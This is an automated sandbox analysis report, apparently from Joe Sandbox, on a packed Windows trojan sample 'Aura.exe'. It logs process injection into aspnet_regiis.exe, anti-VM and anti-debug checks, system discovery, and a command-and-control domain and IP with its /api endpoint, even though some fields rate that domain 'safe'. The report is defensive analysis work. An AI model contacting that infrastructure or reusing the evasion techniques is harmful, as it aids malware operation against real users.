    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02799882
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A5570
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027B9970
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02787960
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02798940
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027B4D10
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278B5F0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027849E0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027869C0
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027A39B0
    Source: C:\Users\user\Desktop\Aura.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
    Source: Aura.exe | Static PE information: invalid certificate
    Source: Aura.exe, 00000000.00000000.2021830455.00000000003E2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameQuinnAvaKaitlyn.tSyST vs Aura.exe
    Source: Aura.exe, 00000000.00000002.2367587213.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs Aura.exe
    Source: Aura.exe | Binary or memory string: OriginalFilenameQuinnAvaKaitlyn.tSyST vs Aura.exe
    Source: Aura.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: Aura.exe | Static PE information: Section: $;3F&L ZLIB complexity 1.0003169993455496
    Source: classification engine | Classification label: mal100.evad.winEXE@6/12@1/1
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027BA710 CoCreateInstance, SysAllocString, CoSetProxyBlanket, SysAllocString, SysAllocString, VariantInit, VariantClear, SysFreeString, SysFreeString, SysFreeString, SysFreeString, GetVolumeInformationW (3_2_027BA710)
    Source: C:\Users\user\Desktop\Aura.exe | File created: C:\Users\user\AppData\Roaming\gdi32.dll
    Source: C:\Users\user\Desktop\Aura.exe | Mutant created: NULL
    Source: C:\Windows\System32\SIHClient.exe | Mutant created: {376155FF-95A0-46CA-8F57-ACB09EA70153}
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4956:120:WilError_03
    Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2836
    Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\be81a78e-517a-4563-a11a-51458097df82
    Source: Aura.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
    Source: C:\Users\user\Desktop\Aura.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\SIHClient.exe | File read: C:\Windows\System32\drivers\etc\hosts (4 times)
    Source: Aura.exe | ReversingLabs: Detection: 36%
    Source: Aura.exe | String found in binary or memory: -addpset
    Source: Aura.exe | String found in binary or memory: -addfulltrust
    Source: Aura.exe | String found in binary or memory: -addgroup
    Source: Aura.exe | String found in binary or memory: -help
    Source: C:\Users\user\Desktop\Aura.exe | File read: C:\Users\user\Desktop\Aura.exe
    Source: unknown | Process created: C:\Users\user\Desktop\Aura.exe "C:\Users\user\Desktop\Aura.exe"
    Source: C:\Users\user\Desktop\Aura.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\Desktop\Aura.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    Source: C:\Users\user\Desktop\Aura.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2836 -s 1228
    Source: C:\Users\user\Desktop\Aura.exe | Process created: C:\Windows\System32\SIHClient.exe C:\Windows\System32\sihclient.exe /cv jMwXD3dEvUmoR35eQmr9Ww.0.2
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: mscoree.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: apphelp.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: kernel.appcore.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: version.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: ucrtbase_clr0400.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: wldp.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: amsi.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: userenv.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: profapi.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: msasn1.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: gpapi.dll
    Source: C:\Users\user\Desktop\Aura.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wldp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winhttp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: webio.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mswsock.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: winnsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: sspicli.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: schannel.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: msasn1.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: gpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: dpapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: wbemcomn.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: amsi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: userenv.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: profapi.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: version.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Users\user\Desktop\Aura.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
    Source: C:\Users\user\Desktop\Aura.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Aura.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

    Data Obfuscation

    Source: C:\Users\user\Desktop\Aura.exe Unpacked PE file: 0.2.Aura.exe.330000.0.unpack $;3F&L:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
    Source: Aura.exe Static PE information: section name: $;3F&L
    Source: Aura.exe Static PE information: section name:
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_003369B6 push eax; iretd 0_2_003369BB
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_003371FE push esp; iretd 0_2_00337208
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_00336FFC push esp; iretd 0_2_00337002
    Source: Aura.exe Static PE information: section name: $;3F&L entropy: 7.999725121175837
    Source: C:\Users\user\Desktop\Aura.exe File created: C:\Users\user\AppData\Roaming\gdi32.dll
    Source: C:\Users\user\Desktop\Aura.exe Process information set: NOOPENFILEERRORBOX (20 identical entries)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical entries)
    Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (51 identical entries)
    Source: C:\Windows\System32\SIHClient.exe Process information set: NOOPENFILEERRORBOX (10 identical entries)

    Malware Analysis System Evasion

    Source: Yara match File source: Process Memory Space: Aura.exe PID: 2836, type: MEMORYSTR
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: D40000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 2750000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 2680000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 4D70000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 5D70000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 5EA0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 6EA0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 71F0000 memory reserve | memory write watch
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: 81F0000 memory reserve | memory write watch
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe TID: 6516 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\System32\SIHClient.exe TID: 2412 Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Windows\System32\SIHClient.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC4FD2 FindFirstFileExW,0_2_6CDC4FD2
    Source: Amcache.hve.6.dr Binary or memory string: VMware
    Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
    Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
    Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
    Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.6.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8-
    Source: aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000002.2612119697.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220130489.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2219902536.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220763050.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2221132911.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: SIHClient.exe, 00000008.00000002.2612119697.0000029D85958000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D85958000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
    Source: Amcache.hve.6.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.6.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.6.dr Binary or memory string: vmci.sys
    Source: Amcache.hve.6.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin`
    Source: Amcache.hve.6.dr Binary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.6.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.6.dr Binary or memory string: VMware20,1
    Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.6.dr Binary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.6.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.6.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.6.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.6.dr Binary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.6.dr Binary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual RAM
    Source: Amcache.hve.6.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: SIHClient.exe, 00000008.00000002.2612119697.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220130489.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2611620582.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2219902536.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2220763050.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 00000008.00000003.2221132911.0000029D859A3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@
    Source: Amcache.hve.6.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API call chain: ExitProcess graph end node graph_3-6258
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API call chain: ExitProcess graph end node graph_3-6241
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe API call chain: ExitProcess graph end node graph_3-6352
    Source: C:\Users\user\Desktop\Aura.exe Process queried: DebugPort
    Source: C:\Users\user\Desktop\Aura.exe Process queried: DebugPort
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Code function: 3_2_027BFAC0 LdrInitializeThunk,3_2_027BFAC0
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC491A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC491A
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC48E9 mov eax, dword ptr fs:[00000030h] 0_2_6CDC48E9
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC3715 mov eax, dword ptr fs:[00000030h] 0_2_6CDC3715
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC64FC GetProcessHeap,0_2_6CDC64FC
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC491A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC491A
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC1AB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6CDC1AB1
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC1F8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6CDC1F8A
    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\Desktop\Aura.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000 protect: page execute and read and write
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000 value starts with: 4D5A
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2780000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2781000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C4000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C7000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D8000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D9000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2781000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C4000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27C7000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D8000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 27D9000
    Source: C:\Users\user\Desktop\Aura.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 2586008
    Source: C:\Users\user\Desktop\Aura.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC2158 cpuid 0_2_6CDC2158
    Source: C:\Users\user\Desktop\Aura.exe Queries volume information: C:\Users\user\Desktop\Aura.exe VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Queries volume information: C:\ VolumeInformation
    Source: C:\Users\user\Desktop\Aura.exe Code function: 0_2_6CDC1BD3 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_6CDC1BD3
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    Source: Amcache.hve.6.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.6.dr Binary or memory string: msmpeng.exe
    Source: Amcache.hve.6.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.6.dr Binary or memory string: MsMpEng.exe

    MITRE ATT&CK Matrix (techniques listed by tactic; a number in parentheses is the count of signatures matched for that technique)

    Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
    Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
    Execution: Windows Management Instrumentation (2); Command and Scripting Interpreter (2); At; Cron; Launchd; Scheduled Task; Systemd Timers
    Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Privilege Escalation: Process Injection (311); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
    Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (4); Disable or Modify Tools (1); Process Injection (311); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
    Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
    Discovery: System Time Discovery (1); Security Software Discovery (51); Virtualization/Sandbox Evasion (4); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (43); Remote System Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
    Collection: Archive Collected Data (1); Clipboard Data (2); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
    Command and Control: Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port
    Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
    Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

    Source | Detection | Scanner | Label | Link
    Aura.exe | 37% | ReversingLabs | Win32.Trojan.Generic
    Aura.exe | 100% | Joe Sandbox ML
    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Roaming\gdi32.dll | 100% | Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    https://property-imper.sbs/Qq | 0% | Avira URL Cloud | safe
    https://property-imper.sbs/apiNlV& | 0% | Avira URL Cloud | safe
    https://property-imper.sbs/api% | 0% | Avira URL Cloud | safe
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    property-imper.sbs | 104.21.33.116 | true | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    https://property-imper.sbs/api | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://property-imper.sbs/api% | aspnet_regiis.exe, 00000003.00000003.2070154688.00000000029FC000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000002.2075123056.00000000029FC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://ocsp.entrust.net03 | Aura.exe | false | | high
    http://ocsp.entrust.net02 | Aura.exe | false | | high
    http://www.entrust.net/rpa03 | Aura.exe | false | | high
    http://aia.entrust.net/ts1-chain256.cer01 | Aura.exe | false | | high
    http://upx.sf.net | Amcache.hve.6.dr | false | | high
    https://property-imper.sbs/Qq | aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A86000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://crl.entrust.net/ts1ca.crl0 | Aura.exe | false | | high
    https://property-imper.sbs/ | aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A86000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://property-imper.sbs/apiNlV& | aspnet_regiis.exe, 00000003.00000002.2075233661.0000000002A80000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2070154688.0000000002A34000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2072356098.0000000002A7D000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://crl.entrust.net/2048ca.crl0 | Aura.exe | false | | high
    https://www.entrust.net/rpa0 | Aura.exe | false | | high
    IP | Domain | Country | Flag | ASN | ASN Name | Malicious
    104.21.33.116 | property-imper.sbs | United States | | 13335 | CLOUDFLARENETUS | false
    Joe Sandbox version: 41.0.0 Charoite
    Analysis ID: 1561474
    Start date and time: 2024-11-23 14:16:56 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 5m 54s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: default.jbs
